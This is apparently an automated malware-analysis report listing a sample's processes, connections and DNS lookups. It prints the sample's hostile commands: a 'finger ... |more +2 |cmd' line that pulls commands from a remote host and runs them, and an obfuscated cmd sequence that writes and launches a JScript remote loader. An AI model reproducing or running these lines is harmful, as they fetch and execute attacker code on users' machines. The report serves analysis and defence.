Technical Information
- '<SYSTEM32>\finger.exe' ok@kraais.suanfemaspi.top
- '<SYSTEM32>\more.com' +2
- '<SYSTEM32>\wscript.exe' "%LOCALAPPDATA%\MGY.js"
- %LOCALAPPDATA%\mgy.js
- 'kr####.suanfemaspi.top':79
- 'ya####.#ua5ysl406xz.monster':80
- 'cl###flare.com':443
- 'microsoft.com':80
- 'kr####.suanfemaspi.top':79
- 'cl###flare.com':443
- DNS ASK kr####.suanfemaspi.top
- DNS ASK ya####.#ua5ysl406xz.monster
- DNS ASK cl###flare.com
- DNS ASK microsoft.com
- '<SYSTEM32>\cmd.exe' /c finger ok@kraais.suanfemaspi.top |more +2 |cmd
- '<SYSTEM32>\cmd.exe'
- '<SYSTEM32>\cmd.exe' /V/D/c "SEt TMQM=.j&&SEt VTKUR=vrXHWarrXHW a =rXHW 'scrXHWrirXHWptrXHW:'; b =rXHW 'hrXHWTtPrXHW:'; GrXHWetrXHWObjrXHWecrXHWt(rXHWa+b+'&&sET ZJQC=FVFLEFVFLEyaeimj.8ua5ysl406xz.monsterFVFLE?1FVFL...
- '<SYSTEM32>\cmd.exe' /S /D /c" sEt/p MR7BN="%VTKUR:rXHW=%%ZJQC:FVFLE=/%" 0<nul 1>%LOCALAPPDATA%\MGY%TMQM%s"
- '<SYSTEM32>\cmd.exe' /S /D /c" start cmd /c start %LOCALAPPDATA%\MGY%TMQM%s "
- '<SYSTEM32>\cmd.exe' /c start %LOCALAPPDATA%\MGY.js